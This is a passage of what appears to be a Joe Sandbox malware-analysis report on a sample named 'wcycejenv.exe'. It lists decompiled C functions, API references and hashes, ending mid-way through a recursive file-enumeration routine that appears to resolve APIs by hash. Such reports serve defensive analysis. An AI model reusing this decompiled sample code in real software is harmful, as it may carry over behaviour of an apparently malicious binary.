Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: NameName::
String ID: A
API String ID: 1333004437-3554254475
Opcode ID: ced73c7e0a98cba0a5411267dbb4254bf0ad03bca314f41cc54175438f0f13be
Instruction ID: 2fca97f5e4274461f0eafac95968a3664b7ebc43aab3e3850905bdda071003e5
Opcode Fuzzy Hash: ced73c7e0a98cba0a5411267dbb4254bf0ad03bca314f41cc54175438f0f13be
Instruction Fuzzy Hash: 7F218E70D04209AFDF14EFD4D8419AE7B71AB14314F00806EE4066B2D2C7799A89DB89

Uniqueness

Uniqueness Score: -1.00%

Function 004131AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004131AB(void* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				void* _t14;
				signed int _t25;
				intOrPtr _t28;
				void* _t32;
				intOrPtr* _t33;

				_t28 = __edx;
				_t33 = _a4;
				_t34 = _t33;
				if(_t33 != 0) {
					__eflags = _a8 - 1;
					if(__eflags != 0) {
						L7:
						_t14 = 0;
						__eflags = 0;
						L8:
						return _t14;
					}
					_v12 = _v12 & 0x00000000;
					_v8 = _v8 & 0x00000000;
					E0042CCDE(__eflags,  &_v12);
					_t25 = _v8;
					_t32 = _v12 - 0xd53e8000;
					asm("sbb ebx, 0x19db1de");
					_v8 = E00445100(_t32, _t25, 0x989680, 0);
					_v16 = _t28;
					__eflags = _t25 - 0x4c4b24;
					if(__eflags > 0) {
						goto L7;
					}
					if(__eflags < 0) {
						L6:
						 *_t33 = E00444F70(_t32, _t25, 0x989680, 0);
						_t14 = 1;
						 *(_t33 + 4) = _v8 * 0x64;
						goto L8;
					}
					__eflags = _t32 - 0xe1404000;
					if(_t32 >= 0xe1404000) {
						goto L7;
					}
					goto L6;
				}
				 *((intOrPtr*)(E0042C135(_t34))) = 0x16;
				E0042C00E();
				return 0;
			}

0x004131ab
0x004131b4
0x004131b7
0x004131b9
0x004131cf
0x004131d5
0x0041323c
0x0041323c
0x0041323c
0x0041323e
0x00000000
0x0041323f
0x004131d7
0x004131de
0x004131e3
0x004131eb
0x004131ee
0x004131fb
0x00413208
0x0041320b
0x0041320e
0x00413214
0x00000000
0x00000000
0x00413216
0x00413220
0x00413232
0x00413236
0x00413237
0x00000000
0x00413237
0x00413218
0x0041321e
0x00000000
0x00000000
0x00000000
0x0041321e
0x004131c0
0x004131c6
0x00000000

APIs

__allrem.LIBCMT ref: 00413203
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00413229

Strings

$KL, xrefs: 0041320E

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID: $KL
API String ID: 1992179935-2900536411
Opcode ID: 6b8f5f22f12442a094916f39d7e80c3c2f927852f3d3ecf25b86d8819acb61fa
Instruction ID: c7b9a5129fb1a1483a1d2749aa3f68e6871fea31b5a29620e59a12f173f77e2e
Opcode Fuzzy Hash: 6b8f5f22f12442a094916f39d7e80c3c2f927852f3d3ecf25b86d8819acb61fa
Instruction Fuzzy Hash: 36110872910318BEDF10FF658D81BAE77B8EB80719F21849AE401B7241D23C9F409759

Uniqueness

Uniqueness Score: -1.00%

Function 0043CFBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0043CFBC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				intOrPtr _t31;
				signed char _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				intOrPtr _t39;
				intOrPtr _t40;
				signed int _t52;
				void* _t54;
				void* _t59;

				_t49 = __edi;
				_t42 = __ebx;
				_push(0x10);
				_push(0x4516c8);
				E00408200(__ebx, __edi, __esi);
				 *(_t54 - 0x1c) =  *(_t54 - 0x1c) & 0x00000000;
				E00433897(8);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				_t52 = 3;
				while(1) {
					 *(_t54 - 0x20) = _t52;
					_t59 = _t52 -  *0x456b00; // 0x200
					if(_t59 == 0) {
						break;
					}
					_t30 =  *0x456b04; // 0x6c2f60
					_t31 =  *((intOrPtr*)(_t30 + _t52 * 4));
					if(_t31 != 0) {
						_t33 =  *(_t31 + 0xc) >> 0xd;
						_t61 = _t33 & 0x00000001;
						if((_t33 & 0x00000001) != 0) {
							_t40 =  *0x456b04; // 0x6c2f60
							_push( *((intOrPtr*)(_t40 + _t52 * 4)));
							if(E0043FF19(_t42, _t49, _t52, _t61) != 0xffffffff) {
								 *(_t54 - 0x1c) =  *(_t54 - 0x1c) + 1;
							}
						}
						_t34 =  *0x456b04; // 0x6c2f60
						DeleteCriticalSection( *((intOrPtr*)(_t34 + _t52 * 4)) + 0x20);
						_t37 =  *0x456b04; // 0x6c2f60
						E0042E2C2( *((intOrPtr*)(_t37 + _t52 * 4)));
						_t39 =  *0x456b04; // 0x6c2f60
						 *(_t39 + _t52 * 4) =  *(_t39 + _t52 * 4) & 0x00000000;
					}
					_t52 = _t52 + 1;
				}
				 *(_t54 - 4) = 0xfffffffe;
				E0043D05E();
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0x10));
				return  *(_t54 - 0x1c);
			}

0x0043cfbc
0x0043cfbc
0x0043cfbc
0x0043cfbe
0x0043cfc3
0x0043cfc8
0x0043cfce
0x0043cfd4
0x0043cfda
0x0043cfdb
0x0043cfdb
0x0043cfde
0x0043cfe4
0x00000000
0x00000000
0x0043cfe6
0x0043cfeb
0x0043cff0
0x0043cff6
0x0043cff9
0x0043cffb
0x0043cffd
0x0043d002
0x0043d00e
0x0043d010
0x0043d010
0x0043d00e
0x0043d013
0x0043d01f
0x0043d025
0x0043d02d
0x0043d033
0x0043d038
0x0043d038
0x0043d03c
0x0043d03c
0x0043d03f
0x0043d046
0x0043d051
0x0043d05d

APIs

Part of subcall function 00433897: EnterCriticalSection.KERNEL32(?,?,00436FD8,?,00451648,0000000C), ref: 004338A6

DeleteCriticalSection.KERNEL32(?,?,?,?,?,004516C8,00000010,00430178), ref: 0043D01F
_free.LIBCMT ref: 0043D02D

Strings

`/l, xrefs: 0043CFE6, 0043CFFD, 0043D013, 0043D025, 0043D033

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: CriticalSection$DeleteEnter_free
String ID: `/l
API String ID: 1836352639-3784181548
Opcode ID: 1c4f9582fc80dbc04c26a8a96699c56885feb92976637565028a73b7bf2077c9
Instruction ID: 16735ecf26d4c7988c460c400c0cba0af9e3ea5d91f3f3d2e22d80eb84815514
Opcode Fuzzy Hash: 1c4f9582fc80dbc04c26a8a96699c56885feb92976637565028a73b7bf2077c9
Instruction Fuzzy Hash: 6F115136A00220CFD724DF98E845B5C77B0EB08729F51116BE461D72E2CB79E802CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B06E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040B06E(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr _t5;
				void* _t13;
				intOrPtr _t20;
				intOrPtr* _t22;

				_t22 = __ecx;
				if( *((char*)(__ecx + 4)) <= 1) {
					_t20 = _a4;
					if(_t20 != 0) {
						_t13 = 0;
						if( *__ecx != 0) {
							_t5 =  *((intOrPtr*)(_t20 + 4));
							if(_t5 == 0 || _t5 == 1) {
								if(E0040E436(0x456034, 8) != 0) {
									_t13 = E0040ACBF(_t6, _t20);
								}
								E0040A720(_t22, _t13);
							} else {
								E0040B0D2(__ecx, _t5);
							}
						} else {
							E0040AD7F(__ecx, _t20);
						}
					}
				}
				return _t22;
			}

0x0040b072
0x0040b078
0x0040b07b
0x0040b080
0x0040b083
0x0040b087
0x0040b091
0x0040b096
0x0040b0b5
0x0040b0bf
0x0040b0bf
0x0040b0c4
0x0040b09c
0x0040b0a0
0x0040b0a0
0x0040b089
0x0040b08a
0x0040b08a
0x0040b0c9
0x0040b0ca
0x0040b0cf

APIs

DName::operator+=.LIBCMT ref: 0040B0A0

Part of subcall function 0040AD7F: pDNameNode::pDNameNode.LIBCMT ref: 0040ADA7

Strings

4`E, xrefs: 0040B0A9

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name$Name::operator+=NodeNode::p
String ID: 4`E
API String ID: 2687079329-3211283174
Opcode ID: 431d48078ff3574e6c6b1a6ef148c776a96fa09500c205f3ce375936b0d60c4f
Instruction ID: 52b8a68a54421046f06fcf54f117973fa9af21182c782b5f2ae7941bc01f8e6f
Opcode Fuzzy Hash: 431d48078ff3574e6c6b1a6ef148c776a96fa09500c205f3ce375936b0d60c4f
Instruction Fuzzy Hash: 13F0F62131130026C632676A4881A3BE28DDF91B05704443FB560B73C2DB7DCC5182ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0040DE2F(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
				char _v12;
				char _v20;
				char _v28;
				signed int* _t18;
				void* _t20;
				signed int* _t27;

				_t20 = __ebx;
				_t27 = E0040E436(0x456034, 8);
				if(_t27 == 0) {
					_t27 = 0;
				} else {
					 *_t27 =  *_t27 & 0x00000000;
					_t27[1] = _t27[1] & 0x00000000;
				}
				E0040D52D(_t20, _a4, _t27);
				E0040D4FF( &_v12);
				_t18 = E0040AEC8(E0040AEEA( &_v12,  &_v20, 0x20),  &_v28, _a8);
				 *_t27 =  *_t18;
				_t27[1] = _t18[1];
				return _a4;
			}

0x0040de2f
0x0040de42
0x0040de46
0x0040de51
0x0040de48
0x0040de48
0x0040de4b
0x0040de4b
0x0040de57
0x0040de60
0x0040de7f
0x0040de86
0x0040de8e
0x0040de93

APIs

DName::operator+.LIBCMT ref: 0040DE71
DName::operator+.LIBCMT ref: 0040DE7F

Strings

4`E, xrefs: 0040DE35

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name::operator+
String ID: 4`E
API String ID: 2943138195-3211283174
Opcode ID: 876428f98f1f742631eadb85c717d132773601bbd42fe1ecbcd61f49c03bb1aa
Instruction ID: 1c3d84db54c830df28fbcf6153f86d241e0d8f8711544be41545f26cf70c0f1e
Opcode Fuzzy Hash: 876428f98f1f742631eadb85c717d132773601bbd42fe1ecbcd61f49c03bb1aa
Instruction Fuzzy Hash: 0AF08171D00319ABCB24EFA5C815BAE7BA8EF14755F40442EE9496B2C1EB34E508C7C4

Uniqueness

Uniqueness Score: -1.00%

Function 00402750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402750(int _a4) {
				int _v8;
				short _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				int _t11;

				_t11 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v32);
				if(_t11 == 0) {
					 *0x454c48 = 0x19;
					 *0x454c4c = 0x50;
				} else {
					 *0x454c48 = _v30;
					 *0x454c4c = _v32.dwSize;
				}
				 *0x454c3c = 1;
				 *0x454c44 = 0;
				 *0x454c50 = 0;
				if(_a4 != 0) {
					_t11 = _a4;
					_v8 = _t11;
				} else {
					_v8 = 0x456fe0;
				}
				 *0x454c40 = _v8;
				return _t11;
			}

0x00402763
0x0040276b
0x00402783
0x0040278d
0x0040276d
0x00402771
0x0040277b
0x0040277b
0x00402797
0x004027a1
0x004027ab
0x004027b9
0x004027c4
0x004027c7
0x004027bb
0x004027bb
0x004027bb
0x004027cd
0x004027d6

APIs

GetStdHandle.KERNEL32(000000F5,?), ref: 0040275C
GetConsoleScreenBufferInfo.KERNEL32(00000000), ref: 00402763

Strings

oE, xrefs: 004027BB

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: BufferConsoleHandleInfoScreen
String ID: oE
API String ID: 3205511803-14833387
Opcode ID: 5eee888cd210471b918390a20a9196d572fbcf6dbfc5735d562b6bd39cf9b9a0
Instruction ID: 546fa88b4ab22336620dcbd3e4159a8d8d20d3e9e9b551dd44e7f39c587df221
Opcode Fuzzy Hash: 5eee888cd210471b918390a20a9196d572fbcf6dbfc5735d562b6bd39cf9b9a0
Instruction Fuzzy Hash: 5501A2B4805308CBC714CF94EA487AA7BB4F78030BF21817AD8045B3D5D7B98584DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004321FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004321FD(void* __eflags, int _a4) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				int _t10;
				void* _t14;

				E0041334C( &_v20, _t14, 0);
				 *0x456d2c =  *0x456d2c & 0x00000000;
				_t10 = _a4;
				if(_t10 != 0xfffffffe) {
					if(_t10 != 0xfffffffd) {
						if(_t10 == 0xfffffffc) {
							 *0x456d2c = 1;
							_t10 =  *(_v16 + 8);
						}
					} else {
						 *0x456d2c = 1;
						_t10 = GetACP();
					}
				} else {
					 *0x456d2c = 1;
					_t10 = GetOEMCP();
				}
				if(_v8 == 0) {
					return _t10;
				} else {
					 *(_v20 + 0x350) =  *(_v20 + 0x350) & 0xfffffffd;
					return _t10;
				}
			}

0x0043220a
0x0043220f
0x00432216
0x0043221c
0x00432233
0x0043224a
0x0043224f
0x00432259
0x00432259
0x00432235
0x00432235
0x0043223f
0x0043223f
0x0043221e
0x0043221e
0x00432228
0x00432228
0x00432260
0x0043226d
0x00432262
0x00432265
0x00000000
0x00432265

APIs

GetOEMCP.KERNEL32(00000000,00432495,?,?,(mE`wB,00456D28,00427760), ref: 00432228
GetACP.KERNEL32(00000000,00432495,?,?,(mE`wB,00456D28,00427760), ref: 0043223F

Strings

(mE`wB, xrefs: 004321FF

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID: (mE`wB
API String ID: 0-657340838
Opcode ID: f6412e6dbaded2d5d7b0f94f5b4d0100b5f2ad34f185c1fd256931d64e5ec126
Instruction ID: 306915de6f3611d58f2bfba2fd29485b2f8f6759ce80b9586e94c1ba81f8f232
Opcode Fuzzy Hash: f6412e6dbaded2d5d7b0f94f5b4d0100b5f2ad34f185c1fd256931d64e5ec126
Instruction Fuzzy Hash: 6AF0C2305002089BEB00DBA4DD0976F7BB0AB4933AF604696E434872E2C7B59D49CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0043016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043016B(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t5;
				signed int _t7;
				void* _t10;
				void* _t16;
				void* _t17;

				E00437C0C(__ecx);
				E0043CFBC(__ebx, __edi, _t16, __eflags);
				_t17 = 0;
				do {
					_t5 =  *0x456b04; // 0x6c2f60
					E0043D073( *((intOrPtr*)(_t17 + _t5)));
					_t7 =  *0x456b04; // 0x6c2f60
					DeleteCriticalSection( *((intOrPtr*)(_t17 + _t7)) + 0x20);
					_t17 = _t17 + 4;
				} while (_t17 != 0xc);
				_t10 = E0042E2C2( *0x456b04);
				 *0x456b04 =  *0x456b04 & 0x00000000;
				return _t10;
			}

0x0043016e
0x00430173
0x00430178
0x0043017a
0x0043017a
0x00430182
0x00430187
0x00430194
0x0043019a
0x0043019d
0x004301a8
0x004301ad
0x004301b6

APIs

Part of subcall function 0043CFBC: DeleteCriticalSection.KERNEL32(?,?,?,?,?,004516C8,00000010,00430178), ref: 0043D01F
Part of subcall function 0043CFBC: _free.LIBCMT ref: 0043D02D

Part of subcall function 0043D073: _free.LIBCMT ref: 0043D097

DeleteCriticalSection.KERNEL32(006C2F40), ref: 00430194
_free.LIBCMT ref: 004301A8

Strings

`/l, xrefs: 0043017A, 00430187, 004301AD

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$CriticalDeleteSection
String ID: `/l
API String ID: 1906768660-3784181548
Opcode ID: 2fea9289c8c183722b7579d046793b0dca818af447d7f25057eb02f1584a3e8d
Instruction ID: 46230b30e53f366369ec7b61f6a690ab47ffabc201c405de394e74c972b875cb
Opcode Fuzzy Hash: 2fea9289c8c183722b7579d046793b0dca818af447d7f25057eb02f1584a3e8d
Instruction Fuzzy Hash: 64E01232914220C7DA31A769FC4564677A59B4D325F42152AF40593162CB29BC00864D

Uniqueness

Uniqueness Score: -1.00%

Function 004041F0 Relevance: 5.1, APIs: 4, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004041F0(long _a4, WCHAR* _a8) {
				WCHAR* _v8;
				void* _v12;
				char _v16;
				char _v2064;
				signed short* _t36;
				signed short* _t37;
				WCHAR* _t38;
				int _t39;
				signed short* _t43;
				intOrPtr _t50;
				WCHAR* _t53;
				signed short* _t56;
				signed int _t65;
				void* _t72;

				_v12 = GetStdHandle(_a4);
				if( *0x454c3c == 0) {
					return E00404330(lstrlenW(_a8), _a8, _t30, _v12);
				} else {
					goto L1;
				}
				do {
					L1:
					_v8 = _a8;
					while(( *_v8 & 0x0000ffff) != 0 && ( *_v8 & 0x0000ffff) != 0xa) {
						_t43 =  *0x454c50; // 0x0
						_t72 = _t43 -  *0x454c4c; // 0x0
						if(_t72 >= 0) {
							break;
						}
						_t56 =  *0x454c50; // 0x0
						 *0x454c50 =  &(_t56[0]);
						_v8 =  &(_v8[1]);
					}
					__eflags = ( *_v8 & 0x0000ffff) - 0xa;
					if(( *_v8 & 0x0000ffff) == 0xa) {
						_t65 =  &(_v8[1]);
						__eflags = _t65;
						_v8 = _t65;
					}
					E00404330(_v12, _a8, _v8 - _a8 >> 1, _v12);
					 *0x454c50 = 0;
					_t36 =  *0x454c44; // 0x0
					_t37 =  &(_t36[0]);
					 *0x454c44 = _t37;
					_t50 =  *0x454c48; // 0x0
					__eflags =  *0x454c44 - _t50 - 1; // 0x0
					if(__eflags >= 0) {
						 *0x454c44 = 0;
						_t38 =  *0x454c40; // 0x0
						_t39 = lstrlenW(_t38);
						_t53 =  *0x454c40; // 0x0
						E00404330(_t39, _t53, _t39, _v12);
						0x400000( &_v16);
						_t37 = E00402570(GetStdHandle(0xfffffff6),  &_v2064,  &_v2064,  &_v2064);
					}
					_a8 = _v8;
					__eflags = _a8;
					if(_a8 == 0) {
						break;
					}
					_t37 = _v8;
					__eflags =  *_t37 & 0x0000ffff;
				} while (( *_t37 & 0x0000ffff) != 0);
				return _t37;
			}

0x00404203
0x0040420d
0x00000000
0x00000000
0x00000000
0x00000000
0x00404213
0x00404213
0x00404216
0x00404219
0x0040422e
0x00404233
0x00404239
0x00000000
0x00000000
0x0040423b
0x00404244
0x00404250
0x00404250
0x0040425b
0x0040425e
0x00404263
0x00404263
0x00404266
0x00404266
0x0040427a
0x0040427f
0x00404289
0x0040428e
0x00404291
0x00404296
0x0040429f
0x004042a5
0x004042a7
0x004042b5
0x004042bb
0x004042c2
0x004042c9
0x004042d9
0x004042ef
0x004042ef
0x004042f7
0x004042fa
0x004042fe
0x00000000
0x00000000
0x00404300
0x00404306
0x00404306
0x00000000

APIs

GetStdHandle.KERNEL32(?), ref: 004041FD
lstrlenW.KERNEL32(00000000,?,?,?,?), ref: 004042BB
GetStdHandle.KERNEL32(000000F6,?,00000000), ref: 004042E8
lstrlenW.KERNEL32(?,?), ref: 00404318

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Handlelstrlen
String ID:
API String ID: 1551267687-0
Opcode ID: 32061460a7c39e770a7d4036f9b8aa58a27a9b9474dd04587c78d5101aeaa41c
Instruction ID: 976909d5e3e9eff9f0b46a92359976635cd300128102676f3259a16189011ca1
Opcode Fuzzy Hash: 32061460a7c39e770a7d4036f9b8aa58a27a9b9474dd04587c78d5101aeaa41c
Instruction Fuzzy Hash: DB4193B1A01204EFCB18DF95E944AAE73B5FBC4306F1081ADF5059B294DB34DE80DB58

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wcycejenv.exePID: 5332, Parent PID: 588COMMON

Execution Graph

Execution Coverage:	31.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	1846
Total number of Limit Nodes:	92

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
